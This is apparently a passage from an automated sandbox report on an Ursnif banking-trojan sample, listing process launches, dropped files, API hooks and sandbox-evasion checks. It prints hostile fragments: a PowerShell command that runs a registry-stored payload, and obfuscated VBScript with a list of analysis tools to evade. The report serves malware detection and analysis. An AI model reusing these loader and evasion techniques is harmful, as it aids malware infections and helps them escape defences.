            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000019.00000002.332931737.00000216A5770000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.342161112.00000193E6DB0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.374046960.000000000E1C0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.374046960.000000000E1C0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")REM highwaymen Cinderella. 2193015 gummy market surjection sculptural warty cotman cliff ketch stroke medial gaslight mandate papyrus calcareous colonist Pearson expulsion Rembrandt krypton Huber debility geodetic vocabularian sour roe inoculate heathenish hearty crystalline oldster Tamil price masochist Bruce ecumenist puree McLeod divorce Muenster landslide committed inhabitation sixfold aluminate larceny pragmatism Sturbridge659 octogenarian cress. campground Giuliano lute Taipei valedictorian Koppers cit. 9962460 celebrant liaison posable shutdown mobcap fit pore wapato. adipic readout Bailey brokerage plausible intoxicant Copernican parsimonious entice razorback Canis. foamflower increase inception requisite contemporaneous switchboard. heaven. 1854466 talky Siegfried, phylogenetic weasel asymmetry phloem ingrained Moiseyev TILpy.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction DJTznna()on error resume nextIf (InStr(WScript.ScriptName, cStr(262827114)) > 0 And NEdZn = 0) ThenExit FunctionREM EEOC taxonomy. guanidine oncoming telephonic uttermost silken Afrikaans Dominique southern Menelaus Dortmund garter804. repellent burglary Sergei job dad tram bonnet. 4263459 Liz accordant fascism grapple prodigal polytope ascomycetes. municipal katydid throaty youngster. Jeremiah Sheehan squall, ostrich invigorate lossy. scops exempt retrospect, 82121 erudite PhD Helmholtz End IfREM seaside melanoma slaughter gavotte turbidity nob, infirmary promulgate cultural. 2883954 Guinevere conceit aviatrix agribusiness, 3430970 knoll clock extract Effie snakeroot kale inconsiderable poison julep coverall poodle farm, prim sadist bristlecone squaw skimp bullet logician inopportune ferry term legend aborigine capitulate journalese demand Mudd label switchblade dreary move Russo clipboard Benny denote Calhoun technic fortyfold urge Pusan committee. 9589938 sextic flounder Friedrich652 Malawi Agnes respirator basketball mud Hokan, Cameroun sportsman638 Hansen Sal nickname interstitial moor invariable pregnant countersink subterfuge ' mozzarella183 quintessential nourish sardonic incoherent indy legend513 probe. narcissist Delmarva alma Josef tutor episode Coronado Poynting strata weatherstripping coquina Sims querulous Clarendon alba connotative. pansy advent vex Brittany thicket meteor picofarad contingent inaccuracy sustenance ashore bookishproc = ((95 + 2327.0) - (4 + (37 + 2381.0)))shivery = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplor
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\explorer.exeCode function: 35_2_06104DCD push 3B000001h; retf

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0k4vu1eoeihu.vbsJump to behavior
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
